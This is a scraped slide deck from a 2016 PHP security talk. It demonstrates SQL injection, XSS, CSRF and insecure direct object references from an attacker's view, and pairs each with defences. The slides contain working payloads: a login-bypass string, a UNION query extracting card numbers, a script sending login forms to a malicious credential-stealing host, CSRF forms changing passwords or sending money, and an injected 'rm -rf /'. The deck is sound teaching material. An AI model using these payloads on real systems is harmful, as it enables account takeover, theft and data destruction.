SlideShare a Scribd company logo

Hacking Your Way To Better Security - php[tek] 2016

Colin O'Dell, profile picture
Colin O'Dell

The document discusses web application security vulnerabilities from an attacker's perspective, emphasizing the understanding and exploitation of SQL injection, XSS, and CSRF attacks. It outlines methods to protect against these vulnerabilities, including input filtering and using prepared statements. The examples provided highlight the real risks to web applications and illustrate the importance of security measures in development.

Software
1 of 117
Downloaded 19 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
Hacking Your Way To Better Security
Colin O’Dell @colinodell Lead Web Developer at Unleashed Technologies PHP developer since 2002 league/commonmark maintainer PHP 7 Migration Guide e-book author php[world] 2015 CtF winner
Goals Explore several top security vulnerabilities from the perspective of an attacker. 1. Understand how to detect and exploit common vulnerabilities 2. Learn how to protect against those vulnerabilities
Disclaimers 1.NEVER test systems that aren’t yours without explicit permission. 2.Examples in this talk are fictional, but the vulnerability behaviors shown are very real.
OWASP Top 10
OWASP Top 10 Regular publication by The Open Web Application Security Project Highlights the 10 most-critical web application security risks
Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016
SQL Injection Modifying SQL statements to: Spoof identity Tamper with data Disclose hidden information
SQL Injection Basics $value = $_REQUEST['value']; SELECT * FROM x WHERE y = '[MALICIOUS CODE HERE]' "; $sql = "SELECT * FROM x WHERE y = '$value' "; $database->query($sql);
Username Password Log In admin password
Username Password Log In admin password' Invalid username or password. Please double-check and try again.
Username Password Log In admin Unknown error.
tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ $
tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = 'password''; $ $ ~~
Username Password Log In admin ' test Unknown error.
Username Password Log In admin Unknown error.
tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $
tail –n 1 /var/log/apache2/error.log MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1. tail –n 1 /var/log/mysql/query.log SELECT * FROM users WHERE username = 'admin' AND password = '' test'; $ $ ~~~~~~~~
~~~~~~~~ SELECT * FROM users WHERE username = 'admin' AND password = '' test'; SELECT * FROM users WHERE username = 'admin' AND password = ''; SELECT * FROM users WHERE username = 'admin' AND password = '' OR (something that is true); SELECT * FROM users WHERE username = 'admin' AND (true); SELECT * FROM users WHERE username = 'admin';
SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ' test
SELECT * FROM users WHERE username = 'admin' AND password = '' test '; SELECT * FROM users WHERE username = 'admin' AND password = '' test '; ' test ~~~~~~~~~~~~~~~~~~~~
SELECT * FROM users WHERE username = 'admin' AND password = ' '; SELECT * FROM users WHERE username = 'admin' AND password = ' ';
SELECT * FROM users WHERE username = 'admin' AND password = '' '; SELECT * FROM users WHERE username = 'admin' AND password = '' '; ' ~~~~
SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' ' '; ' ' ~~~~~~~~~~~~~~~~
SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' '; ' OR '
SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1 ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1 ' '; ' OR '1 ' ~~~~
SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1' ' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1' ' '; ' OR '1' ' ~~~~~~~~~
SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'=' '; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'=' '; ' OR '1'='
SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1'; SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1'; ' OR '1'='1
Username Password Log In admin ' OR '1'='1 Unknown error.
Welcome Admin! Admin Menu: Give customer money Take money away Review credit card applications Close accounts
Blind SQL Injection
Blind SQL Injection Invalid username or password. Please double-check and try again. Unknown error. Valid query (empty result) Invalid query Welcome Admin! Valid query (with result)
' AND (SELECT id FROM user LIMIT 1) = ' Username Password admin Log In Real-Time MySQL View
' AND (SELECT id FROM user LIMIT 1) = ' Username Password admin Unknown error. Log In Error LogQuery Log SELECT * FROM users WHERE username = 'admin' AND password = '' AND (SELECT id FROM user LIMIT 1) = '';
' AND (SELECT id FROM user LIMIT 1) = ' Username Password admin Unknown error. Log In Query Log MySQL error: Unknown table 'user'. Error Log
' AND (SELECT id FROM users LIMIT 1) = ' Username Password admin Unknown error. Log In Query Log MySQL error: Unknown table 'user'. Error Log
' AND (SELECT id FROM users LIMIT 1) = ' Username Password admin Invalid username or password. Please double-check and try again. Log In
SQL Injection - Data Disclosure
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/123 SELECT * FROM books WHERE id = 123 $id = 
; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => 'The Great Gatsby', 'author' => 'F. Scott Fitzgerald', 'price' => 9.75 }
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 SELECT * FROM books WHERE id = 99999 $id = 
; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { }
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/????? SELECT * FROM books WHERE id = ????? $id = 
; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
SQL UNION Query Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 Foo Bar 123 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Foo Bar 123 UNION
SQL UNION Query Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 The Great Gatsby F. Scott Fitzgerald 9.75 (SELECT) 1 1 UNION
SQL UNION Query Column 1 Column 2 Column 3 (empty) Column 1 Column 2 Column 3 (SELECT) 1 1 Column 1 Column 2 Column 3 (SELECT) 1 1 UNION
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number FROM creditcards SELECT * FROM books WHERE id = ????? $id = 
; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = ????? $id = 
; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0.00 }
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = 
; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '', 'author' => '', 'price' => 0 }
SQL Injection - Data Disclosure http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards SELECT * FROM books WHERE id = 99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards $id = 
; $sql = "SELECT title, author, price FROM books WHERE id = " . $id; $data = $database->query($sql); { 'title' => '4012-3456-7890-1234', 'author' => 1, 'price' => 1 }
Protecting Against SQL Injection $value = $_REQUEST['value']; $sql = "SELECT * FROM x WHERE y = '$value' "; $database->query($sql);
Protecting Against SQL Injection Block input with special characters
Protecting Against SQL Injection Block input with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
Protecting Against SQL Injection Block input with special characters Escape user input $value = $_REQUEST['value']; $escaped = mysqli_real_escape_string($value); $sql = "SELECT * FROM x WHERE y = '$escaped' "; $database->query($sql); ' OR '1' = '1 ' OR '1' = '1 mysqli_real_escape_string() SELECT * FROM x WHERE y = '' OR '1' = '1'
Protecting Against SQL Injection Block input with special characters Escape user input Use prepared statements $mysqli = new mysqli("localhost", "user", "pass", "db"); $q = $mysqli->prepare("SELECT * FROM x WHERE y = '?' "); $q->bind_param(1, $_REQUEST['value']); $q->execute(); Native PHP: ● mysqli ● pdo_mysql Frameworks / Libraries: ● Doctrine ● Eloquent ● Zend_Db
Other Types of Injection NoSQL databases OS Commands LDAP Queries SMTP Headers $file = $_GET['filename']; shell_exec("rm uploads/{$file}"); /rm.php?filename=foo.jpg+%26%26+rm+-rf+%2F rm uploads/foo.jpg && rm -rf /
XSS Cross-Site Scripting Injecting code into the webpage (for other users) ‱ Execute malicious scripts ‱ Hijack sessions ‱ Install malware ‱ Deface websites
XSS Attack Basics $value = $_POST['value']; $value = $rssFeed->first->title; $value = db_fetch('SELECT value FROM table'); <?php echo $value ?> Raw code/script is injected onto a page
XSS – Cross-Site Scripting Basics Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
XSS – Cross-Site Scripting short.ly Paste a URL here Shorten
XSS – Cross-Site Scripting short.ly http://www.colinodell.com Shorten
XSS – Cross-Site Scripting short.ly http://www.colinodell.com Shorten Short URL: http://short.ly/b7fe9 Original URL: http://www.colinodell.com
XSS – Cross-Site Scripting short.ly Please wait while we redirect you to http://www.colinodell.com
XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten
XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL: hello world! OK X
XSS – Cross-Site Scripting short.ly <script>alert('hello world!');</script> Shorten Short URL: http://short.ly/3bs8a Original URL:
<p> Short URL: <a href="
">http://short.ly/3bs8a</a> </p> <p> Original URL: <a href="
"><script>alert('hello world!');</script></a> </p>
XSS – Cross-Site Scripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten
XSS – Cross-Site Scripting short.ly <iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten Short URL: http://short.ly/3bs8a Original URL:
XSS – Cross-Site Scripting short.ly Please wait while we redirect you to
XSS – Cross-Site Scripting document.getElementById('login-form').action = 'http://malicious-site.com/steal-passwords.php';
Protecting Against XSS Attacks $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo $value ?>
Protecting Against XSS Attacks ‱ Filter user input $value = strip_tags($_POST['value']); $value = strip_tags( db_fetch('SELECT value FROM table') ); $value = strip_tags($rssFeed->first->title); <?php echo $value ?>
Protecting Against XSS Attacks ‱ Filter user input ‱ Escape user input $value = htmlspecialchars($_POST['value']); $value = htmlspecialchars( db_fetch('SELECT value FROM table') ); $value = htmlspecialchars($rssFeed->first->title); <?php echo $value ?> <script> &lt;script&gt; htmlspecialchars()
Protecting Against XSS Attacks ‱ Filter user input ‱ Escape user input ‱ Escape output $value = $_POST['value']; $value = db_fetch('SELECT value FROM table'); $value = $rssFeed->first->title; <?php echo htmlspecialchars($value) ?>
Protecting Against XSS Attacks ‱ Filter user input ‱ Escape user input ‱ Escape output {{ some_variable }} {{ some_variable|raw }}
CSRF Cross-Site Request Forgery Execute unwanted actions on another site which user is logged in to. ‱ Change password ‱ Transfer funds ‱ Anything the user can do
CSRF – Cross-Site Request Forgery Hi Facebook! I am colinodell and my password is *****. Welcome Colin! Here’s your news feed. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners.
CSRF – Cross-Site Request Forgery Hi other website! Show me your homepage. Sure, here you go! Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script>
CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Tell Facebook we want to change our password to hacked123 Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners.
CSRF – Cross-Site Request Forgery <form id="evilform" action="https://facebook.com/password.php" method="post"> <input type="password" value="hacked123"> </form> <script> document.getElementById('evilform').submit(); </script> Hi Facebook! Please change my password to hacked123. Snipicons by Snip Master licensed under CC BY-NC 3.0. Cookie icon by Daniele De Santis licensed under CC BY 3.0. Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png Logos are copyright of their respective owners. Done!
CSRF – Cross-Site Request Forgery short.ly <img src="https://paypal.com/pay?email=me@evil.com&amt=9999"> Shorten
CSRF – Cross-Site Request Forgery short.ly Please wait while we redirect you to X
Protecting Against CSRF Attacks Only use POST requests?
Protecting Against CSRF Attacks Only use POST requests? NO! POST requests are vulnerable too Common Misconceptions: “<img> tags can only make GET requests” “If a user doesn’t click a form it won’t submit”
Protecting Against CSRF Attacks Only use POST requests? Use a secret cookie?
Protecting Against CSRF Attacks Only use POST requests? Use a secret cookie? NO! Cookies are sent on every request.
Protecting Against CSRF Attacks Only use POST requests? Use a secret cookie? Use random CSRF tokens YES! <input type="hidden" name="token" value="ao3i4yw90sae8rhsdrf"> 1. Generate a random string per user. 2. Store it in their session. 3. Add to form as hidden field. 4. Compare submitted value to session 1. Same token? Proceed. 2. Different/missing? Reject the request.
Insecure Direct Object References Access & manipulate objects you shouldn’t have access to
Insecure Direct Object References
Insecure Direct Object References Beverly Cooper
Insecure Direct Object References
Insecure Direct Object References
Insecure Direct Object References
Insecure Direct Object References
Protecting Against Insecure Direct Object References Check permission on data input ‱ URL / route parameters ‱ Form field inputs ‱ Basically anything that’s an ID ‱ If they don’t have permission, show a 403 (or 404) page
Protecting Against Insecure Direct Object References Check permission on data input Check permission on data output ‱ Do they have permission to access this object? ‱ Do they have permission to even know this exists? ‱ This is not “security through obscurity”
Sensitive Data Exposure Security Misconfiguration Components with Known Vulnerabilities
http://www.example.com/CHANGELOG http://www.example.com/composer.lock http://www.example.com/.git/ http://www.example.com/.env http://www.example.com/robots.txt Sensitive Data Exposure
Sensitive Data Exposure - CHANGELOG
Sensitive Data Exposure – composer.lock
Sensitive Data Exposure – composer.lock
Sensitive Data Exposure – .git
Sensitive Data Exposure – robots.txt
Private information that is stored, transmitted, or backed-up in clear text (or with weak encryption) ‱ Customer information ‱ Credit card numbers ‱ Credentials Sensitive Data Exposure
Security Misconfiguration & Components with Known Vulnerabilities Default accounts enabled; weak passwords ‱ admin / admin Security configuration ‱ Does SSH grant root access? ‱ Are weak encryption keys used? Out-of-date software ‱ Old versions with known issues ‱ Are the versions exposed? ‱ Unused software running (DROWN attack)
Components with Known Vulnerabilities
Components with Known Vulnerabilities
Components with Known Vulnerabilities
Protecting Against Sensitive Data Exposure, Security Mismanagement, and Components with Known Vulnerabilities Keep software up-to-date ‱ Install critical updates immediately ‱ Install other updates regularly
Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root ‱ Files which provide version numbers ‱ README, CHANGELOG, .git, composer.lock ‱ Database credentials & API keys ‱ Encryption keys
Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption ‱ Encrypt with a strong private key ‱ Encrypt backups and data-in-transit ‱ Use strong hashing techniques for passwords
Protecting Against Sensitive Data Exposure, Security Mismanagement, and Components with Known Vulnerabilities Keep software up-to-date Keep sensitive data out of web root Use strong encryption Test your systems ‱ Scan your systems with automated tools ‱ Test critical components yourself ‱ Automated tests ‱ Manual tests
Next Steps Test your own applications for vulnerabilities Learn more about security & ethical hacking Enter security competitions (like CtF) Stay informed
Questions?
Thanks! Slides & feedback: https://joind.in/talk/f7516 Colin O'Dell @colinodell

More Related Content

PPTX
Hacking Your Way to Better Security - PHP South Africa 2016
Colin O'Dell
 
PDF
Hacking Your Way To Better Security
Colin O'Dell
 
PPTX
Hacking Your Way to Better Security - ZendCon 2016
Colin O'Dell
 
PPTX
Hacking Your Way To Better Security - DrupalCon Baltimore 2017
Colin O'Dell
 
PDF
Php Security - OWASP
Mizno Kruge
 
PPTX
Web Security - Hands-on
Andrea Valenza
 
PPTX
Hacking Your Way To Better Security - Dutch PHP Conference 2016
Colin O'Dell
 
PDF
DEF CON 27 -OMER GULL - select code execution from using sq lite
Felipe Prado
 
Hacking Your Way to Better Security - PHP South Africa 2016
Colin O'Dell
 
Hacking Your Way To Better Security
Colin O'Dell
 
Hacking Your Way to Better Security - ZendCon 2016
Colin O'Dell
 
Hacking Your Way To Better Security - DrupalCon Baltimore 2017
Colin O'Dell
 
Php Security - OWASP
Mizno Kruge
 
Web Security - Hands-on
Andrea Valenza
 
Hacking Your Way To Better Security - Dutch PHP Conference 2016
Colin O'Dell
 
DEF CON 27 -OMER GULL - select code execution from using sq lite
Felipe Prado
 

What's hot (20)

PDF
Web2py
Lucas D
 
PDF
Apache Solr Search Mastery
Acquia
 
PDF
Dollar symbol
Aaron Huang
 
PDF
Using web2py's DAL in other projects or frameworks
Bruno Rocha
 
PDF
Đ’ĐŸĐ·ĐŒĐŸĐ¶ĐœĐŸŃŃ‚Đž, ĐŸŃĐŸĐ±Đ”ĐœĐœĐŸŃŃ‚Đž Đž ĐżŃ€ĐŸĐ±Đ»Đ”ĐŒŃ‹ AR::Relation
АлДĐșŃĐ°ĐœĐŽŃ€ Đ•Đ¶ĐŸĐČ
 
KEY
Symfony2 Building on Alpha / Beta technology
Daniel Knell
 
PDF
Better Bullshit Driven Development [SeleniumCamp 2017]
automician
 
PDF
SQLAlchemy Seminar
Yury Yurevich
 
PDF
Dig Deeper into WordPress - WD Meetup Cairo
Mohamed Mosaad
 
PPTX
jQuery Fundamentals
Gil Fink
 
PDF
PhoneGap: Local Storage
Ivano Malavolta
 
PPT
Clean code
Lilit Mkrtchyan
 
PPTX
Roman iovlev. Test UI with JDI - Selenium camp
Đ ĐŸĐŒĐ°Đœ Đ˜ĐŸĐČлДĐČ
 
PPTX
J query training
FIS - Fidelity Information Services
 
PDF
How to lose your database and your job
Ryan Gooler
 
PDF
Web2py Code Lab
Colin Su
 
PDF
Solr Anti - patterns
RafaƂ Kuć
 
PPT
jQuery
Niladri Karmakar
 
PDF
Practical Object Oriented Models In Sql
Karwin Software Solutions LLC
 
PDF
Essentials and Impactful Features of ES6
Riza Fahmi
 
Web2py
Lucas D
 
Apache Solr Search Mastery
Acquia
 
Dollar symbol
Aaron Huang
 
Using web2py's DAL in other projects or frameworks
Bruno Rocha
 
Đ’ĐŸĐ·ĐŒĐŸĐ¶ĐœĐŸŃŃ‚Đž, ĐŸŃĐŸĐ±Đ”ĐœĐœĐŸŃŃ‚Đž Đž ĐżŃ€ĐŸĐ±Đ»Đ”ĐŒŃ‹ AR::Relation
АлДĐșŃĐ°ĐœĐŽŃ€ Đ•Đ¶ĐŸĐČ
 
Symfony2 Building on Alpha / Beta technology
Daniel Knell
 
Better Bullshit Driven Development [SeleniumCamp 2017]
automician
 
SQLAlchemy Seminar
Yury Yurevich
 
Dig Deeper into WordPress - WD Meetup Cairo
Mohamed Mosaad
 
jQuery Fundamentals
Gil Fink
 
PhoneGap: Local Storage
Ivano Malavolta
 
Clean code
Lilit Mkrtchyan
 
Roman iovlev. Test UI with JDI - Selenium camp
Đ ĐŸĐŒĐ°Đœ Đ˜ĐŸĐČлДĐČ
 
J query training
FIS - Fidelity Information Services
 
How to lose your database and your job
Ryan Gooler
 
Web2py Code Lab
Colin Su
 
Solr Anti - patterns
RafaƂ Kuć
 
jQuery
Niladri Karmakar
 
Practical Object Oriented Models In Sql
Karwin Software Solutions LLC
 
Essentials and Impactful Features of ES6
Riza Fahmi
 

Viewers also liked (14)

PDF
Ajax & Reverse Ajax Presenation
Rishabh Garg
 
ODP
Polling Techniques, Ajax, protocol Switching from Http to Websocket standard ...
Srikanth Reddy Pallerla
 
DOCX
Resume
Gajanan Naik
 
PPTX
Enviar procesos
ƅÀƄhĂ€ÄŸĂœ ÄžĂŒĂ€ĆˆĂŒÄhĂ«
 
PDF
ThreePhasedImplementationPlan
pbaxter
 
PPTX
MECANISMO EFECTIVOS PARA GOBIERNO DE TI
miguel martinez rivera
 
PPTX
Real time data integration best practices and architecture
Bui Kiet
 
PPTX
5 perubahan struktur ekonomi adhi nugraha 5x
adhi nugraha
 
PPTX
La Provincia de Los Santos
Maria Sanchez
 
PPT
short presentation on financial management
Raghav Bansal
 
PPT
On Customer Data Integration
wouter.trumpie
 
PPTX
CorrosiĂłn
valeriaabenitez
 
PDF
High range Bellow type Pressure Switch MD series
NK Instruments Pvt. Ltd.
 
PDF
T type Five Valve Manifold (5VK)
NK Instruments Pvt. Ltd.
 
Ajax & Reverse Ajax Presenation
Rishabh Garg
 
Polling Techniques, Ajax, protocol Switching from Http to Websocket standard ...
Srikanth Reddy Pallerla
 
Resume
Gajanan Naik
 
Enviar procesos
ƅÀƄhĂ€ÄŸĂœ ÄžĂŒĂ€ĆˆĂŒÄhĂ«
 
ThreePhasedImplementationPlan
pbaxter
 
MECANISMO EFECTIVOS PARA GOBIERNO DE TI
miguel martinez rivera
 
Real time data integration best practices and architecture
Bui Kiet
 
5 perubahan struktur ekonomi adhi nugraha 5x
adhi nugraha
 
La Provincia de Los Santos
Maria Sanchez
 
short presentation on financial management
Raghav Bansal
 
On Customer Data Integration
wouter.trumpie
 
CorrosiĂłn
valeriaabenitez
 
High range Bellow type Pressure Switch MD series
NK Instruments Pvt. Ltd.
 
T type Five Valve Manifold (5VK)
NK Instruments Pvt. Ltd.
 

Similar to Hacking Your Way To Better Security - php[tek] 2016 (20)

PDF
PHP-UK 2025: Ending Injection Vulnerabilities
Craig Francis
 
PPTX
SQL Injection in action with PHP and MySQL
Pradeep Kumar
 
PPT
SQL Injection in PHP
Dave Ross
 
PDF
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
 
PPT
SQL Injection Attacks
Compare Infobase Limited
 
PDF
Sql Injection
Andrey Korshikov
 
PPTX
03. sql and other injection module v17
Eoin Keary
 
PDF
Out-of-band SQL Injection Attacks (#istsec)
Ömer Çıtak
 
PPTX
Owasp Indy Q2 2012 Advanced SQLi
owaspindy
 
PDF
My app is secure... I think
Wim Godden
 
PPTX
Sql injection
Mehul Boghra
 
PPTX
SQL Injections - 2016 - Huntington Beach
Jeff Prom
 
PDF
A Brief Introduction About Sql Injection in PHP and MYSQL
kobaitari
 
PDF
2014 database - course 3 - PHP and MySQL
Hung-yu Lin
 
PPT
Sql injection
Nikunj Dhameliya
 
PDF
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
PPT
General Principles of Web Security
jemond
 
ODP
My app is secure... I think
Wim Godden
 
PPTX
How did i steal your database
Mostafa Siraj
 
PPT
Advanced Sql Injection ENG
Dmitry Evteev
 
PHP-UK 2025: Ending Injection Vulnerabilities
Craig Francis
 
SQL Injection in action with PHP and MySQL
Pradeep Kumar
 
SQL Injection in PHP
Dave Ross
 
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
 
SQL Injection Attacks
Compare Infobase Limited
 
Sql Injection
Andrey Korshikov
 
03. sql and other injection module v17
Eoin Keary
 
Out-of-band SQL Injection Attacks (#istsec)
Ömer Çıtak
 
Owasp Indy Q2 2012 Advanced SQLi
owaspindy
 
My app is secure... I think
Wim Godden
 
Sql injection
Mehul Boghra
 
SQL Injections - 2016 - Huntington Beach
Jeff Prom
 
A Brief Introduction About Sql Injection in PHP and MYSQL
kobaitari
 
2014 database - course 3 - PHP and MySQL
Hung-yu Lin
 
Sql injection
Nikunj Dhameliya
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
General Principles of Web Security
jemond
 
My app is secure... I think
Wim Godden
 
How did i steal your database
Mostafa Siraj
 
Advanced Sql Injection ENG
Dmitry Evteev
 

More from Colin O'Dell (20)

PPTX
Demystifying Unicode - Longhorn PHP 2021
Colin O'Dell
 
PPTX
Releasing High Quality Packages - Longhorn PHP 2021
Colin O'Dell
 
PPTX
Releasing High Quality PHP Packages - ConFoo Montreal 2019
Colin O'Dell
 
PPTX
Debugging Effectively - ConFoo Montreal 2019
Colin O'Dell
 
PPTX
Automating Deployments with Deployer - php[world] 2018
Colin O'Dell
 
PPTX
Releasing High-Quality Packages - php[world] 2018
Colin O'Dell
 
PPTX
Debugging Effectively - DrupalCon Nashville 2018
Colin O'Dell
 
PPTX
CommonMark: Markdown Done Right - ZendCon 2017
Colin O'Dell
 
PDF
Rise of the Machines: PHP and IoT - ZendCon 2017
Colin O'Dell
 
PPTX
Debugging Effectively - All Things Open 2017
Colin O'Dell
 
PPTX
Debugging Effectively - PHP UK 2017
Colin O'Dell
 
PPTX
Debugging Effectively - SunshinePHP 2017
Colin O'Dell
 
PPTX
Automating Your Workflow with Gulp.js - php[world] 2016
Colin O'Dell
 
PPTX
Rise of the Machines: PHP and IoT - php[world] 2016
Colin O'Dell
 
PPTX
Debugging Effectively - ZendCon 2016
Colin O'Dell
 
PPTX
Debugging Effectively - DrupalCon Europe 2016
Colin O'Dell
 
PPTX
CommonMark: Markdown done right - Nomad PHP September 2016
Colin O'Dell
 
PPTX
Debugging Effectively - Frederick Web Tech 9/6/16
Colin O'Dell
 
PPTX
Debugging Effectively
Colin O'Dell
 
PDF
CommonMark: Markdown Done Right
Colin O'Dell
 
Demystifying Unicode - Longhorn PHP 2021
Colin O'Dell
 
Releasing High Quality Packages - Longhorn PHP 2021
Colin O'Dell
 
Releasing High Quality PHP Packages - ConFoo Montreal 2019
Colin O'Dell
 
Debugging Effectively - ConFoo Montreal 2019
Colin O'Dell
 
Automating Deployments with Deployer - php[world] 2018
Colin O'Dell
 
Releasing High-Quality Packages - php[world] 2018
Colin O'Dell
 
Debugging Effectively - DrupalCon Nashville 2018
Colin O'Dell
 
CommonMark: Markdown Done Right - ZendCon 2017
Colin O'Dell
 
Rise of the Machines: PHP and IoT - ZendCon 2017
Colin O'Dell
 
Debugging Effectively - All Things Open 2017
Colin O'Dell
 
Debugging Effectively - PHP UK 2017
Colin O'Dell
 
Debugging Effectively - SunshinePHP 2017
Colin O'Dell
 
Automating Your Workflow with Gulp.js - php[world] 2016
Colin O'Dell
 
Rise of the Machines: PHP and IoT - php[world] 2016
Colin O'Dell
 
Debugging Effectively - ZendCon 2016
Colin O'Dell
 
Debugging Effectively - DrupalCon Europe 2016
Colin O'Dell
 
CommonMark: Markdown done right - Nomad PHP September 2016
Colin O'Dell
 
Debugging Effectively - Frederick Web Tech 9/6/16
Colin O'Dell
 
Debugging Effectively
Colin O'Dell
 
CommonMark: Markdown Done Right
Colin O'Dell
 

Recently uploaded (20)

PDF
Upgrade and Innovation Strategies for SAP ERP Customers
Virendra Rai, PMP
 
PDF
Adobe Illustrator 28.6 Crack My Vision of Vector Design
ghrom2211g
 
